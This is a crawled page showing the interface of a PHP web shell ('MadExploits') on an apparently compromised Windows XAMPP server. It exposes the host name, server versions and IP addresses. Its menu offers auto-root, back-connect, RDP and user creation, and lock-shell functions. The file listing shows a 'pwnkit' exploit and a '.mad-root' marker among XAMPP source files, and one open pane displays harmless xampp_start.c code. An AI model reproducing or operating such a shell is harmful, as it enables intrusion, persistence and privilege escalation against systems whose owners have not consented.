Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.28
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
src /
xampp-start-stop /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Makefile
810
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
checkdll.c
516
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
rc.h
115
B
-rw-rw-rw-
xampp.ico
30.17
KB
-rw-rw-rw-
xampp.rc
1020
B
-rw-rw-rw-
xampp_start.c
796
B
-rw-rw-rw-
xampp_stop.c
1.42
KB
-rw-rw-rw-
xampp_util.c
1.55
KB
-rw-rw-rw-
xampp_util.h
140
B
-rw-rw-rw-
xamppcli.c
2.08
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xampp_start.c
// Copyright (C) 2007-2010 Kai Seidler, oswald@apachefriends.org, GPL-licensed #include <windows.h> #include <stdio.h> #include <process.h> #include "xampp_util.h" int main(int argc, char **argv) { char buffer[200]; char *start[10][10] = { {"apache\\bin\\httpd.exe", "-f conf\\httpd.conf", NULL}, {"mysql\\bin\\mysqld.exe", "--defaults-file=mysql\\bin\\my.ini", "--standalone", NULL}, {NULL} }; printf("\nXAMPP now starts as a console application.\n\n"); printf("Instead of pressing Control-C in this console window, please use xampp_stop.exe\n"); printf("to stop XAMPP, because it lets XAMPP end any current transactions and cleanup\n"); printf("gracefully.\n\n"); xampp_cdx(); xampp_call(start); Sleep(10000); return(0); }
Close